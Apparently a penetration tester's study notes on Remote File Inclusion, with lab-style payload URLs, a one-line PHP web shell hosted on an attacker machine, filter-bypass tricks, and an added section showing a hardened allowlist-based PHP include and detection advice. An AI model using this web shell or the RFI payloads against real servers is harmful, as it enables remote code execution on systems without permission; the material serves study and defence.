RFI - Remote File Inclusion

See PG Practice SLORT for an example of serving a PHP reverse shell that executes on Windows as soon as it is included.

https://securityxploded.com/remote-file-inclusion.php

Less common than LFI, because the target has to be configured to allow remote includes; however, ALWAYS CHECK for it if you have found an LFI.

Test payload:

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

A successful test shows up as an incoming connection on an nc listener on the attacker host.

Exploiting:

Host the file with malicious php code:

kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2

Call it with the RFI payload:

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig

Tricks:

  • Add a null byte (%00) to terminate the string and bypass a filetype restriction

  • Append a ? to the end of the payload so that whatever the application appends becomes part of the URL's query string rather than the path

  • If http:// is filtered, try an SMB path instead
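The defensive counterpart of the exploit above, as an added example that is not part of these notes: a minimal PHP page dispatcher written the way menu.php is usually written, beside a hardened version that resolves the page name through a fixed allowlist, so the RFI payload, the null-byte trick and the trailing-? trick all fall into the same refuse branch. The names render_page_vulnerable, render_page_hardened, resolve_page, PAGE_DIR and PAGES are assumptions.

```php
<?php
// Added example (not from the original notes). Function and constant names
// are assumed; the page names in the allowlist are constructed sample data.

// --- Vulnerable form (what menu.php?file=... usually looks like) ---
// With allow_url_include=On, include() fetches and executes
// http://10.11.0.4/evil.txt; with it Off, the same line is still an LFI.
function render_page_vulnerable(string $file): void
{
    include $file;                     // attacker controls the whole path
}

// --- Hardened form ---
// 1. Only fixed page keys are accepted (allowlist), so a URL scheme, a %00
//    byte or a trailing ? never reaches include().
// 2. The real path is built from a constant directory, never from input.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Map a request parameter to an on-disk path, or null if it is not listed.
function resolve_page(string $name): ?string
{
    if (!array_key_exists($name, PAGES)) {
        return null;                   // unknown key: refuse, do not guess
    }
    return PAGE_DIR . '/' . PAGES[$name];
}

function render_page_hardened(string $name): void
{
    $path = resolve_page($name);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Usage:
//   render_page_hardened($_GET['file'] ?? 'home');
// ?file=http://10.11.0.4/evil.txt, ?file=../../etc/passwd%00 and
// ?file=http://10.11.0.4/evil.txt? all end in the 404 branch, because
// none of them is a key of PAGES.
```

The allowlist is the actual fix; the php.ini setting allow_url_include=Off (the default since PHP 5.2, deprecated in 7.4) only stops include() from fetching URLs, which is why RFI is rarer than LFI but also why a server that has it on is worth the check the notes insist on. For detection, the request for evil.txt in the web server's access log (a query string carrying http:// or a %00) is the visible artefact on the target side.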
